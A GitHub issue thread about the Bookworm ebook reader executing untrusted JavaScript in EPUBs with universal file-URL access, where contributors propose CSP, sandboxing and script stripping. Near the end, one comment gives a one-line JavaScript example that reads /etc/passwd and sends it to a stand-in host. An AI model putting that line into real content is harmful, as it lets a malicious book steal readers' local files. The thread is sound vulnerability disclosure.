babluboy / bookworm

A simple ebook reader for Elementary OS
GNU General Public License v3.0
1.32k stars 100 forks source link

[Security] bookworm executes javascript in epubs #283

Open FedericoCeratto opened 4 years ago

FedericoCeratto commented 4 years ago

Moved here from #180

There are different issues independent from each other:

  1. javascript allows network connections by design (!) leading to https://en.wikipedia.org/wiki/Phoning_home
  2. javascript engines have a plethora of vulnerabilities and a poor track record. Here a random list: https://github.com/tunz/js-vuln-db
  3. by executing potentially untrusted code the engine also gives access to hardware vulnerabilities on the host, for example https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)#History
  4. browsers have very large attack surfaces in general

Bookworm does not provide clear warnings that ebooks will be opened in a browser. To the user it appears as if Bookworm is a simple stand-alone application.

johnfactotum commented 4 years ago

The allow-universal-access-from-file-urls property is the most problematic, IMO:

https://github.com/babluboy/bookworm/blob/756953c1342f8c4c323be42360686579e2d4dc3c/src/window.vala#L168

This should be disabled if it's not really needed. Without it, even when JavaScript is allowed, it won't be able to make any cross-origin requests.

Apart from JavaScript, external images and other resources should also be blocked, if possible. In Foliate I've used Content Security Policy (CSP) to block JavaScript and other contents. It might be possible for Bookworm to do something similar.

It would be great if someone can make an EPUB file to demonstrate the various security issues, as well as functioning as a security testing tool. GNOME Books, for example, also allows JavaScript and other external images (I've opened an issue), and one imagines that this might be the case for many e-book readers out there.

Bookworm does not provide clear warnings that ebooks will be opened in a browser. To the user it appears as if Bookworm is a simple stand-alone application.

A lot of people have the perception that EPUB files are something lesser than full-blown webpages, but actually they are exactly that. Scripting, multimedia elements, etc., are all explicitly allowed in EPUB 3. It's impracticable to not use browser engines to render EPUB.

See also:

babluboy commented 4 years ago

@FedericoCeratto @johnfactotum Many thanks for raising this issue and also providing guidance on the exposure and potential solutions. I would need a ePub to test this issue, so will start from there - hopefully from the links sighted above I can create a few HTML files and then make an epub out of it. As @johnfactotum mentioned many bookreaders use a webkit/browser to display html contents and hence are exposed to the potential threat. But its always good to remove the exposure so will work on removing the same from Bookworm

set_allow_universal_access_from_file_urls is something that I had added as it was not working on Ubuntu Yakkety. Maybe I dont need it anymore and can remove the same.

Will use this issue to track the javascript exposure.

FedericoCeratto commented 4 years ago

Perhaps it's possible to mitigate the attack surface with a combination of:

  1. Stripping risky contents from epubs before launching the browser: javascript, and external URLs in images and inside CSS and in SVG. The stripping can be disabled selectively on a given epub, e.g. by pressing toggles "allow SVG", "allow javascript"
  2. Sandboxing: open the epub, fork, create a seccomp sandbox that can access the file descriptor and little else, run the browser in there.
  3. Configure in-browser blocking e.g. CSP
cholmcc commented 4 years ago

Hi,

Just a thought: How about pruning the epub XHTML before passing it on to webkit or the like?

That is, use for example BeautifulSoup to remove all <script> tags and all javascript: handlers (Python code)

    doc = BeautifulSoup(src)

    for t in doc.find_all('script'):
        t.extract()

    for t in doc.find(lambda t: any(['javascript:' in v for k,v in t.attrs])):
         for k,v in t.attrs:
             if 'javascript:' in v:
                  del t[k]

Of course, that will ruin any use of MathJax, interactive epub's or similar. Also, to be absolutely safe, one probably also need to inspect all base64 encoded strings for javascript. One might have

<img src='data:img/png;base64;encoded>

where encoded could potentially contain malicious code. Perhaps WebKit already filters that out.

Yours,

Christian

johnfactotum commented 4 years ago

I think if possible, using the browser's built-in capacity to block contents would be more secure (as well as more efficient) than attempting to preprocess the content manually.

With CSP, for example, base64 encoded strings can be easily blocked, and you can choose what kind of resource to block. Also, WebKit now has a content blocker API, which might be worth looking into as well.

But most importantly, allow-universal-access-from-file-urls should be set to false. Not allowing scripts universal access would mitigate a lot of security problems, without hurting some legitimate use cases of scripting.

FedericoCeratto commented 4 years ago

@johnfactotum CSP & co addresses only point 1 in the bug report and cannot address 2, 3 and 4. It can be still useful as a layer of additional protection. @cholmcc the large majority of epubs work well without javascript, CSS and so on: disabling non-critical elements by default and allowing them with a button might be a good tradeoff.

johnfactotum commented 4 years ago

@FedericoCeratto With CSP or WebKit Content Blockers, it should be possible to block all untrusted scripts (as well as stylesheets, images, etc.), so point 2, 3, and 4 can also be mitigated as well to some extend. Ultimately, one should never open any file without trusting it. While it's true that browsers have very large attack surfaces in general, all XML/HTML parsers and whatever's used for rendering also have vulnerabilities, even if you only implement a subset of browser features. If I'm worried about these kind of vulnerabilities, I would run the application sandboxed, and possibly even from a separate physical machine.

It would be interesting, though, if one renders EPUBs using GTK TextView or Pango markups (as Bookworm is a GTK app, after all). Personally, I don't really agree that "the large majority of epubs work well without javascript, CSS and so on" -- a lot of them don't even work well with them! -- but as @babluboy has stated that he will be "moving away from the current design where the epub's CSS / Stylesheet is used for rendering the content and go towards a design where all books will be rendered based on a Bookworm specific stylesheet" (https://github.com/babluboy/bookworm/issues/151#issuecomment-569413884), I don't think it would unreasonable to not use WebKit for rendering.

johnfactotum commented 4 years ago

WebKit also has an optoin to run subprocesses sandboxed using Bubblewrap with WebKit.WebContext.set_sandbox_enabled.

johnfactotum commented 4 years ago

@babluboy I've not thought of this before, but allowing untrusted JavaScript to run with allow-universal-access-from-file-urls means a malicious book can read ALL your local files and send the contents to remote servers.

This is a real vulnerability, not just a potential or theoretical threat. I've made an EPUB file with various test cases: https://github.com/johnfactotum/epub-test/blob/master/epub-test.epub, in particular note that Bookworm allows the book to request both local files and external URLs without any restrictions. Also for some reason external URLs are still being loaded inside Bookworm, rather than opening in the browser.

FedericoCeratto commented 4 years ago

@johnfactotum would you mind sharing a PoC epub that does homecalling and optionally tries to read local files? Thanks!

FedericoCeratto commented 4 years ago

FYI https://en.wikipedia.org/wiki/EPUB#Security_and_privacy_concerns

rbrito commented 4 years ago

While I completely get the privacy and security issues of having JavaScript, most people may use MathJax (or similar, like katex) to get mathematics in epub ebooks.

You can get a sample from this calibre's site: https://manual.calibre-ebook.com/typesetting_math.html (it links to a sample in a link there in the middle).

FedericoCeratto commented 4 years ago

I updated the comment https://github.com/babluboy/bookworm/issues/283#issuecomment-553352707 with a more flexible permission model

johnfactotum commented 4 years ago

@rbrito Ideally they should use MathML, or just plain images, if MathML and JavaScript are not supported/enabled.

Anyway, JavaScript in itself is not the biggest problem. In Bookworm's case, JavaScript with unlimited network and local file access is a serious problem.

@FedericoCeratto I made a test file here: https://github.com/johnfactotum/epub-test/blob/master/epub-test.epub

Using this EPUB file as an example, click on fetch('https://example.com/') and fetch('file:///etc/passwd') in the "Javascript" section.

Looking at the source code, you can see that when you click on those elements, the EPUB file will try to fetch the remote and local URLs, and then write the response to the document.

When you click on them, Bookworm displays the contents of example.com and /etc/passwd, respectively (tested with Bookworm 1.1.2 on Arch Linux). So this means the attacker has full read access to both. They can easily do something like

fetch('file:///etc/passwd').then(res => res.text()).then(text => fetch('https://example.com/?passwd=' + text))

And now they can remotely read any file they want on your local file system!

kousu commented 3 years ago

Bookworm is very pretty but until it sandboxes its content I don't want to use it or recommend it to my friends. It's a pity. It's very very pretty!

danielweck commented 3 years ago

In the spirit of open-source, I wrote my own piece here: https://github.com/edrlab/thorium-reader/issues/1375 Food for thoughts :)